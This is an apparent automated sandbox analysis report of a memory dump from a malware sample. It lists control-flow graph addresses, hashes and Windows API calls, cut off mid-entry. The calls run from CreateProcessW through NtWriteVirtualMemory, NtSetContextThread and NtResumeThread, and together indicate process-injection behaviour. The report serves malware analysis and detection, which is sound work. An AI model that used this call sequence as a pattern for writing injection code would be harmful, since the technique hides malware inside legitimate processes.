                                    control_flow_graph 0 2ed6ba-2ed6f2 1 2ed6f9-2ed815 0->1 2 2ed6f4 0->2 11 2ed81c-2ed88d call 2eabac 1->11 12 2ed817 1->12 2->1 17 2ed88f 11->17 18 2ed894-2ed89f 11->18 12->11 17->18 144 2ed8a5 call 2ee208 18->144 145 2ed8a5 call 2ee218 18->145 19 2ed8ab-2ed8bd 20 2ed8bf 19->20 21 2ed8c4-2ed8d1 19->21 20->21 22 2ed8d8-2ed8e3 21->22 23 2ed8d3 21->23 150 2ed8e9 call 2ee208 22->150 151 2ed8e9 call 2ee218 22->151 23->22 24 2ed8ef-2ed934 26 2ed93b-2ed970 24->26 27 2ed936 24->27 152 2ed973 call 2ec458 26->152 153 2ed973 call 2ec451 26->153 27->26 29 2ed975-2ed9b2 31 2ed9b9-2ed9e3 29->31 32 2ed9b4 29->32 34 2ed9ea-2ed9f5 31->34 35 2ed9e5 31->35 32->31 154 2ed9fb call 2ee208 34->154 155 2ed9fb call 2ee218 34->155 35->34 36 2eda01-2eda3a 156 2eda3d call 2ec558 36->156 157 2eda3d call 2ec550 36->157 38 2eda3f-2eda58 39 2eda5f-2eda9c 38->39 40 2eda5a 38->40 43 2eda9e 39->43 44 2edaa3-2edb0f 39->44 40->39 43->44 48 2edb16-2edb4a 44->48 49 2edb11 44->49 50 2edb4c 48->50 51 2edb51-2edb5c 48->51 49->48 50->51 136 2edb62 call 2ee208 51->136 137 2edb62 call 2ee218 51->137 52 2edb68-2edb85 53 2edb8c-2edb9f 52->53 54 2edb87 52->54 140 2edba2 call 2ec678 53->140 141 2edba2 call 2ec670 53->141 54->53 55 2edba4-2edbe5 57 2edbec-2edbf7 55->57 58 2edbe7 55->58 148 2edbfd call 2ee208 57->148 149 2edbfd call 2ee218 57->149 58->57 59 2edc03-2edc36 62 2edc3d-2edc8e 59->62 63 2edc38 59->63 65 2edf2c-2edf62 62->65 66 2edc94-2edcdf 62->66 63->62 69 2edf69-2edf9a 65->69 70 2edf64 65->70 78 2edce6-2edd8e 66->78 79 2edce1 66->79 73 2edf9c 69->73 74 2edfa1-2edfc0 69->74 70->69 73->74 76 2edfc7-2edfdd 74->76 77 2edfc2 74->77 80 2edfdf 76->80 81 2edfe4-2ee030 76->81 77->76 89 2edd95-2edd9f 78->89 90 2edd90 78->90 79->78 80->81 138 2ee033 call 2ec678 81->138 139 2ee033 call 2ec670 81->139 94 2edda6-2eddad 89->94 95 2edda1 89->95 90->89 91 2ee035-2ee065 92 2ee06c-2ee077 91->92 93 2ee067 91->93 146 2ee07d call 2ee208 92->146 147 2ee07d call 2ee218 92->147 93->92 96 2eddaf 94->96 97 2eddb4-2eddda 94->97 95->94 96->97 104 2edddc 97->104 105 2edde1-2ede2d 97->105 98 2ee083-2ee095 100 2ee09c-2ee0a1 98->100 101 2ee097 98->101 102 2ee0a8-2ee0bd 100->102 103 2ee0a3 100->103 101->100 106 2ee0bf 102->106 107 2ee0c4-2ee104 102->107 103->102 104->105 113 2ede2f 105->113 114 2ede34-2ede3d 105->114 106->107 110 2ee10b-2ee126 107->110 111 2ee106 107->111 158 2ee129 call 2ec7c8 110->158 159 2ee129 call 2ec7d0 110->159 111->110 113->114 115 2ede3f 114->115 116 2ede44-2ede87 114->116 115->116 124 2ede8e-2ededd 116->124 125 2ede89 116->125 117 2ee12b-2ee168 120 2ee16f-2ee1a3 117->120 121 2ee16a 117->121 134 2ee1a6 call 2ec458 120->134 135 2ee1a6 call 2ec451 120->135 121->120 129 2ededf 124->129 130 2edee4-2edef7 124->130 125->124 126 2ee1a8-2ee1fe 129->130 142 2edefa call 2ec678 130->142 143 2edefa call 2ec670 130->143 132 2edefc-2edf26 132->65 132->66 134->126 135->126 136->52 137->52 138->91 139->91 140->55 141->55 142->132 143->132 144->19 145->19 146->98 147->98 148->59 149->59 150->24 151->24 152->29 153->29 154->36 155->36 156->38 157->38 158->117 159->117
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,$LRp
                                    • API String ID: 0-2335222473
                                    • Opcode ID: 09e148346e21ee80d8ec894685ec117776d44f139518859cb883b80aa73c9537
                                    • Instruction ID: 0ae1801ea81379f154fe2b0d67df93ce22ab86fa9775ce5a14ce996d9177206c
                                    • Opcode Fuzzy Hash: 09e148346e21ee80d8ec894685ec117776d44f139518859cb883b80aa73c9537
                                    • Instruction Fuzzy Hash: 0E62A474A002699FDB64DF69CD85BDDBBB2AB89300F1480EAD90DA7351DB319E81CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 280 2ec921-2ec962 281 2ec969-2eca85 280->281 282 2ec964 280->282 291 2eca8c-2ecafd call 2eab0c 281->291 292 2eca87 281->292 282->281 297 2ecaff 291->297 298 2ecb04-2ecb0f 291->298 292->291 297->298 428 2ecb15 call 2ed478 298->428 429 2ecb15 call 2ed488 298->429 299 2ecb1b-2ecb2d 300 2ecb2f 299->300 301 2ecb34-2ecb41 299->301 300->301 302 2ecb48-2ecb53 301->302 303 2ecb43 301->303 436 2ecb59 call 2ed478 302->436 437 2ecb59 call 2ed488 302->437 303->302 304 2ecb5f-2ecba4 306 2ecbab-2ecbe0 304->306 307 2ecba6 304->307 438 2ecbe3 call 2ec458 306->438 439 2ecbe3 call 2ec451 306->439 307->306 309 2ecbe5-2ecc22 311 2ecc29-2ecc53 309->311 312 2ecc24 309->312 314 2ecc5a-2ecc65 311->314 315 2ecc55 311->315 312->311 414 2ecc6b call 2ed478 314->414 415 2ecc6b call 2ed488 314->415 315->314 316 2ecc71-2eccaa 416 2eccad call 2ec558 316->416 417 2eccad call 2ec550 316->417 318 2eccaf-2eccc8 319 2ecccf-2ecd0c 318->319 320 2eccca 318->320 323 2ecd0e 319->323 324 2ecd13-2ecd7f 319->324 320->319 323->324 328 2ecd86-2ecdba 324->328 329 2ecd81 324->329 330 2ecdbc 328->330 331 2ecdc1-2ecdcc 328->331 329->328 330->331 424 2ecdd2 call 2ed478 331->424 425 2ecdd2 call 2ed488 331->425 332 2ecdd8-2ecdf5 333 2ecdfc-2ece0f 332->333 334 2ecdf7 332->334 426 2ece12 call 2ec678 333->426 427 2ece12 call 2ec670 333->427 334->333 335 2ece14-2ece55 337 2ece5c-2ece67 335->337 338 2ece57 335->338 434 2ece6d call 2ed478 337->434 435 2ece6d call 2ed488 337->435 338->337 339 2ece73-2ecea6 342 2ecead-2ecefe 339->342 343 2ecea8 339->343 345 2ed19c-2ed1d2 342->345 346 2ecf04-2ecf4f 342->346 343->342 349 2ed1d9-2ed20a 345->349 350 2ed1d4 345->350 358 2ecf56-2ecffe 346->358 359 2ecf51 346->359 353 2ed20c 349->353 354 2ed211-2ed230 349->354 350->349 353->354 356 2ed237-2ed24d 354->356 357 2ed232 354->357 360 2ed24f 356->360 361 2ed254-2ed2a0 356->361 357->356 370 2ed005-2ed00f 358->370 371 2ed000 358->371 359->358 360->361 422 2ed2a3 call 2ec678 361->422 423 2ed2a3 call 2ec670 361->423 369 2ed2a5-2ed2d5 372 2ed2dc-2ed2e7 369->372 373 2ed2d7 369->373 374 2ed016-2ed01d 370->374 375 2ed011 370->375 371->370 432 2ed2ed call 2ed478 372->432 433 2ed2ed call 2ed488 372->433 373->372 376 2ed01f 374->376 377 2ed024-2ed04a 374->377 375->374 376->377 384 2ed04c 377->384 385 2ed051-2ed09d 377->385 378 2ed2f3-2ed305 379 2ed30c-2ed311 378->379 380 2ed307 378->380 382 2ed318-2ed32d 379->382 383 2ed313 379->383 380->379 386 2ed32f 382->386 387 2ed334-2ed374 382->387 383->382 384->385 393 2ed09f 385->393 394 2ed0a4-2ed0ad 385->394 386->387 391 2ed37b-2ed396 387->391 392 2ed376 387->392 418 2ed399 call 2ec7c8 391->418 419 2ed399 call 2ec7d0 391->419 392->391 393->394 395 2ed0af 394->395 396 2ed0b4-2ed0f7 394->396 395->396 404 2ed0fe-2ed14d 396->404 405 2ed0f9 396->405 397 2ed39b-2ed3d8 400 2ed3df-2ed413 397->400 401 2ed3da 397->401 420 2ed416 call 2ec458 400->420 421 2ed416 call 2ec451 400->421 401->400 409 2ed14f 404->409 410 2ed154-2ed167 404->410 405->404 406 2ed418-2ed46e 409->410 430 2ed16a call 2ec678 410->430 431 2ed16a call 2ec670 410->431 412 2ed16c-2ed196 412->345 412->346 414->316 415->316 416->318 417->318 418->397 419->397 420->406 421->406 422->369 423->369 424->332 425->332 426->335 427->335 428->299 429->299 430->412 431->412 432->378 433->378 434->339 435->339 436->304 437->304 438->309 439->309
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRp
                                    • API String ID: 0-3405495957
                                    • Opcode ID: 176aa9c748953ed63769bd4416274cfc90d2636462e668618a54676f13584ac7
                                    • Instruction ID: 5e3925d9c18a228222b3c7ded8dc6e2fd9bbeeb0bfa7cec868fa59e6aa1f490b
                                    • Opcode Fuzzy Hash: 176aa9c748953ed63769bd4416274cfc90d2636462e668618a54676f13584ac7
                                    • Instruction Fuzzy Hash: 9262A374A012699FDB64DF69CD84BDDBBB2AB89310F1480EAD90CA7351DB319E81CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 440 2eb870-2eb92a 442 2eb9e2-2eb9f7 440->442 443 2eb930-2eb96b 440->443 444 2eb9fd-2eba43 442->444 445 2ebaa7-2ebaab 442->445 460 2eb96d-2eb975 443->460 461 2eb9a3-2eb9b4 443->461 465 2eba45-2eba4d 444->465 466 2eba81-2eba8c 444->466 446 2ebaad-2ebaef 445->446 447 2ebaf5-2ebb46 445->447 446->447 449 2ebbfe-2ebc10 447->449 450 2ebb4c-2ebb87 447->450 452 2ebc2d-2ebc3f 449->452 453 2ebc12-2ebc2a 449->453 480 2ebbbf-2ebbd0 450->480 481 2ebb89-2ebb91 450->481 457 2ebc5c-2ebcd2 CreateProcessW 452->457 458 2ebc41-2ebc59 452->458 453->452 462 2ebcdb-2ebd1c 457->462 463 2ebcd4-2ebcda 457->463 458->457 467 2eb998-2eb9a1 460->467 468 2eb977-2eb981 460->468 469 2eb9ba-2eb9da 461->469 489 2ebd1e-2ebd2d 462->489 490 2ebd33-2ebd4a 462->490 463->462 472 2eba4f-2eba59 465->472 473 2eba70-2eba7f 465->473 479 2eba92-2ebaa1 466->479 467->469 474 2eb985-2eb994 468->474 475 2eb983 468->475 469->442 476 2eba5d-2eba6c 472->476 477 2eba5b 472->477 473->479 474->474 478 2eb996 474->478 475->474 476->476 486 2eba6e 476->486 477->476 478->467 479->445 493 2ebbd6-2ebbf6 480->493 487 2ebbb4-2ebbbd 481->487 488 2ebb93-2ebb9d 481->488 486->473 487->493 491 2ebb9f 488->491 492 2ebba1-2ebbb0 488->492 489->490 498 2ebd4c-2ebd58 490->498 499 2ebd63-2ebd73 490->499 491->492 492->492 496 2ebbb2 492->496 493->449 496->487 498->499 500 2ebd8a-2ebdcd 499->500 501 2ebd75-2ebd84 499->501 506 2ebdcf-2ebdd3 500->506 507 2ebddd-2ebde1 500->507 501->500 506->507 510 2ebdd5-2ebdd8 call 2e0420 506->510 508 2ebde3-2ebde7 507->508 509 2ebdf1-2ebdf5 507->509 508->509 512 2ebde9-2ebdec call 2e0420 508->512 513 2ebdf7-2ebdfb 509->513 514 2ebe05 509->514 510->507 512->509 513->514 516 2ebdfd-2ebe00 call 2e0420 513->516 516->514
                                    APIs
                                    • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 002EBCBF
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: a4b108ac5fc3e22ca518f2d52b8ee07e57cbec77adc3349750a6ab6d418d6959
                                    • Instruction ID: 0bf7c03acfa5e8fb689c33b683ddecf3658fe59a0aac1813657c34abfede619b
                                    • Opcode Fuzzy Hash: a4b108ac5fc3e22ca518f2d52b8ee07e57cbec77adc3349750a6ab6d418d6959
                                    • Instruction Fuzzy Hash: 0802EE74E102698FDF25CFA9C884B9EBBF1BF49304F5081A9E808B7251DB349A95CF54
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: p
                                    • API String ID: 0-2181537457
                                    • Opcode ID: dc1a746e3f7fb978291ad18bd73414fe6d1c505e093818795d68b7b2ae2fd9b6
                                    • Instruction ID: ae47b8c74357d20383e0ef538d1bd4d1596652f4a5b795387744328cba6f41b0
                                    • Opcode Fuzzy Hash: dc1a746e3f7fb978291ad18bd73414fe6d1c505e093818795d68b7b2ae2fd9b6
                                    • Instruction Fuzzy Hash: 8F32E374910299CFDB94DF69C584A8DFBB2BF89351F55C5A9D808AB212CB30DD81CFA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: p
                                    • API String ID: 0-2181537457
                                    • Opcode ID: 1628205f35728f8990162db9d6ae1586dd29bc6e5950b0d857b33f059bdd4e78
                                    • Instruction ID: e94625db922e44d69b088ce048d82d324b005b31e7a8389a0627a850dcdda944
                                    • Opcode Fuzzy Hash: 1628205f35728f8990162db9d6ae1586dd29bc6e5950b0d857b33f059bdd4e78
                                    • Instruction Fuzzy Hash: 1032C374910299CFDB54DFA9C580A8DFBB2BF88351F55C5A9C448AB212CB70ED82CF61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 817 2ec670-2ec6e0 819 2ec6f7-2ec758 NtWriteVirtualMemory 817->819 820 2ec6e2-2ec6f4 817->820 822 2ec75a-2ec760 819->822 823 2ec761-2ec7b3 819->823 820->819 822->823
                                    APIs
                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 002EC748
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryVirtualWrite
                                    • String ID:
                                    • API String ID: 3527976591-0
                                    • Opcode ID: 0389d1fc9f73e460f5bcddacdf8573eece4075115e280d55a9c8bac100ab8fb2
                                    • Instruction ID: 4289dd0946a00425016c94611a5b9b4628b1d243886dd02e50b82cf12f65c3b6
                                    • Opcode Fuzzy Hash: 0389d1fc9f73e460f5bcddacdf8573eece4075115e280d55a9c8bac100ab8fb2
                                    • Instruction Fuzzy Hash: EE41CCB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250C3789A45CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 828 2ec678-2ec6e0 830 2ec6f7-2ec758 NtWriteVirtualMemory 828->830 831 2ec6e2-2ec6f4 828->831 833 2ec75a-2ec760 830->833 834 2ec761-2ec7b3 830->834 831->830 833->834
                                    APIs
                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 002EC748
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryVirtualWrite
                                    • String ID:
                                    • API String ID: 3527976591-0
                                    • Opcode ID: afb4d16ef632afd6f90600ad2641d90a902114774bc2e49fcf3d4e3bdc39c5d0
                                    • Instruction ID: 90c9d13304f9ddd76d1053784213e225c8f9145fa119fa3c5a13bf6f7843d754
                                    • Opcode Fuzzy Hash: afb4d16ef632afd6f90600ad2641d90a902114774bc2e49fcf3d4e3bdc39c5d0
                                    • Instruction Fuzzy Hash: 4541AAB5D012589FCF00CFAAD984AEEFBF1BB49314F24942AE814B7250D374AA55CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 839 2ec320-2ec3ea NtReadVirtualMemory 842 2ec3ec-2ec3f2 839->842 843 2ec3f3-2ec445 839->843 842->843
                                    APIs
                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 002EC3DA
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryReadVirtual
                                    • String ID:
                                    • API String ID: 2834387570-0
                                    • Opcode ID: c5da7ec10c88d12bf4cb7d01741666c92446c904b7b955826d206f44e849da04
                                    • Instruction ID: 14a0f924ef93742a4161da2c4fec2b0c9e52ea4cce5e9d7451270663d59b9140
                                    • Opcode Fuzzy Hash: c5da7ec10c88d12bf4cb7d01741666c92446c904b7b955826d206f44e849da04
                                    • Instruction Fuzzy Hash: 5D41BCB5D002589FCF10CFAAD984AEEFBB1BF49310F24942AE815B7240C774A946CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 848 2ec328-2ec3ea NtReadVirtualMemory 851 2ec3ec-2ec3f2 848->851 852 2ec3f3-2ec445 848->852 851->852
                                    APIs
                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 002EC3DA
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryReadVirtual
                                    • String ID:
                                    • API String ID: 2834387570-0
                                    • Opcode ID: a4a0b9d2a7a768b8867e5eee5979fef761f5ddba1bac8f45b965323c20c0bc88
                                    • Instruction ID: aa61f3c091869b133eb3d1431d431b3b251f9fed7a22b067b2e8a148edff6296
                                    • Opcode Fuzzy Hash: a4a0b9d2a7a768b8867e5eee5979fef761f5ddba1bac8f45b965323c20c0bc88
                                    • Instruction Fuzzy Hash: A441A9B5D002589FCF10CFAAD984AEEFBB1BB49310F20942AE814B7200C774A945CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 875 2ec7c8-2ec830 877 2ec847-2ec88f NtSetContextThread 875->877 878 2ec832-2ec844 875->878 880 2ec898-2ec8e4 877->880 881 2ec891-2ec897 877->881 878->877 881->880
                                    APIs
                                    • NtSetContextThread.NTDLL(?,?), ref: 002EC87F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ContextThread
                                    • String ID:
                                    • API String ID: 1591575202-0
                                    • Opcode ID: 44e0e11ae897324424cd1470b123ed684eb8bd55e684582b9ef45a81c5eaf1d9
                                    • Instruction ID: 76763bf922612ce1e1c8eb2107a1348374734deb390d9d5187c2638e22f224e4
                                    • Opcode Fuzzy Hash: 44e0e11ae897324424cd1470b123ed684eb8bd55e684582b9ef45a81c5eaf1d9
                                    • Instruction Fuzzy Hash: 3941AAB5D102589FCB14CFAAD984AEEBFF1AB49314F24842AE414B7240C7789949CF54
                                    APIs
                                    • NtSetContextThread.NTDLL(?,?), ref: 002EC87F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ContextThread
                                    • String ID:
                                    • API String ID: 1591575202-0
                                    • Opcode ID: 3dbdcbfd236b6bfea15401fbe5d19d6b2bc1a16350fd35cb03a71a1b8af8113a
                                    • Instruction ID: c25974d06ab68c9b1d0622e1a198442fb17fe880f72a54cdc5d93de9b147568d
                                    • Opcode Fuzzy Hash: 3dbdcbfd236b6bfea15401fbe5d19d6b2bc1a16350fd35cb03a71a1b8af8113a
                                    • Instruction Fuzzy Hash: 2731BBB5D102589FCB10CFAAD984AEEFBF1BF49314F24842AE414B7240C778A949CF54
                                    APIs
                                    • NtResumeThread.NTDLL(?,?), ref: 002EC4E1
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 79f6cc0df1f8c82de32ec176dcf0c1bb9f764250cdfe3a791794554ba8fd23f0
                                    • Instruction ID: 252e8a53827ebb3a449a8ffd26784c0b31e544e8c8093c0475a3116c1d3781af
                                    • Opcode Fuzzy Hash: 79f6cc0df1f8c82de32ec176dcf0c1bb9f764250cdfe3a791794554ba8fd23f0
                                    • Instruction Fuzzy Hash: BF31AAB5D012589FCF10CFA9E984AEEFBF1AB49314F24942AE805B7340C774A946CF54
                                    APIs
                                    • NtResumeThread.NTDLL(?,?), ref: 002EC4E1
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 023f69b262956f654107e5d3dac05b3f984bfe8c44d1240708cb78723d21fbc1
                                    • Instruction ID: b0a115655d6f9803a7844634e08e2dcbf27f396842618cad2d46bb53b24bfa70
                                    • Opcode Fuzzy Hash: 023f69b262956f654107e5d3dac05b3f984bfe8c44d1240708cb78723d21fbc1
                                    • Instruction Fuzzy Hash: D331B9B5D012589FCF10CFAAE984AAEFBF5BB49310F20942AE805B7300C774A945CF94
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c34d0ca8c0741635c76d828124b91ee9ace4a234469a6a5240a0f884d513c331
                                    • Instruction ID: 11f2417a09e78b49df27f3c7e4f8f13a4b2d47cf0488c42bdf36c113c2bc8d65
                                    • Opcode Fuzzy Hash: c34d0ca8c0741635c76d828124b91ee9ace4a234469a6a5240a0f884d513c331
                                    • Instruction Fuzzy Hash: FC42F4749001998FDB54DFADC984A9DFBF2BF88345F59C5AAD408AB212DB30D981CF90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8e7d4e689504fddef3d1706faaffe38847798a5e45745fa244d211804cd1ce66
                                    • Instruction ID: 3ddef0e47101dbac662001a03e81eaa7ba7a31adf287706fddb5108ee40d051f
                                    • Opcode Fuzzy Hash: 8e7d4e689504fddef3d1706faaffe38847798a5e45745fa244d211804cd1ce66
                                    • Instruction Fuzzy Hash: 7E429F74E11229CFDB64CFA9C984B9DBBB2BF48300F5481A9E809A7355D730AE81CF50
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c0e45676498530183ebd17b93f249683cfedafb68b6c3b6e5929468e8c28ca24
                                    • Instruction ID: ae2e3e47f56ceb6f8cf4ed5314855320195ec1f6bc33de4ccc361b0feff401c0
                                    • Opcode Fuzzy Hash: c0e45676498530183ebd17b93f249683cfedafb68b6c3b6e5929468e8c28ca24
                                    • Instruction Fuzzy Hash: FD428074E11229CFDB64CFA9C984B9DBBB2BF48310F5181A9E809A7355D731AE81CF50
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e6f9796d7c26994cc6e17332809ac48eb3409c2efe00ae7eadf19eb62d33a31e
                                    • Instruction ID: 12450b71159e96545922b473e51bddca03753d2ea94ab1231d7ea7ff4ec6bec1
                                    • Opcode Fuzzy Hash: e6f9796d7c26994cc6e17332809ac48eb3409c2efe00ae7eadf19eb62d33a31e
                                    • Instruction Fuzzy Hash: DF429274E15229CFDB54CFA9C984B9DBBB2BF48310F5481A9D809A7395DB30AE81CF50
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a00253f70dede38acfafd2b416bc1606aa651916af90494659c411c49e0fcdc
                                    • Instruction ID: 2ba75652bb31746afc7fe2c6a7fb3a71820faab747d5fc1414ab6dbb999ae4e2
                                    • Opcode Fuzzy Hash: 0a00253f70dede38acfafd2b416bc1606aa651916af90494659c411c49e0fcdc
                                    • Instruction Fuzzy Hash: B512F4749002958FDB54DFADC988A8DFBF2BF88355F59C5AAD408AB212DB30D981CF50
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f8cc68e1b3b1d7928e756f26678b1243ad1ecdd6af9d175dd7f1215db4f8d5f9
                                    • Instruction ID: 21bf8022a4f73cbb952228c4c0cdb24bad399140a5d867d65b4e1d6ee10736a8
                                    • Opcode Fuzzy Hash: f8cc68e1b3b1d7928e756f26678b1243ad1ecdd6af9d175dd7f1215db4f8d5f9
                                    • Instruction Fuzzy Hash: BD619674E01208DFDB58DFAAD994ADDBBF2BF89300F249169E505AB365DB309941CF00

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 857 2ec550-2ec612 VirtualAllocEx 860 2ec61b-2ec665 857->860 861 2ec614-2ec61a 857->861 861->860
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002EC602
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 13cb2eb02b6390d5589d2c1c13ab53002cad73fc62ab0b561787f2ed1871f109
                                    • Instruction ID: 58c87a05ac629e604ebc68bc5e0c791199ad26afa85e815f4fb6a44fbbd43471
                                    • Opcode Fuzzy Hash: 13cb2eb02b6390d5589d2c1c13ab53002cad73fc62ab0b561787f2ed1871f109
                                    • Instruction Fuzzy Hash: 3B31ABB9D002589FCF10CFA9D984AEEFBB1BB49310F20A42AE815B7350C735A946CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 866 2ec558-2ec612 VirtualAllocEx 869 2ec61b-2ec665 866->869 870 2ec614-2ec61a 866->870 870->869
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002EC602
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
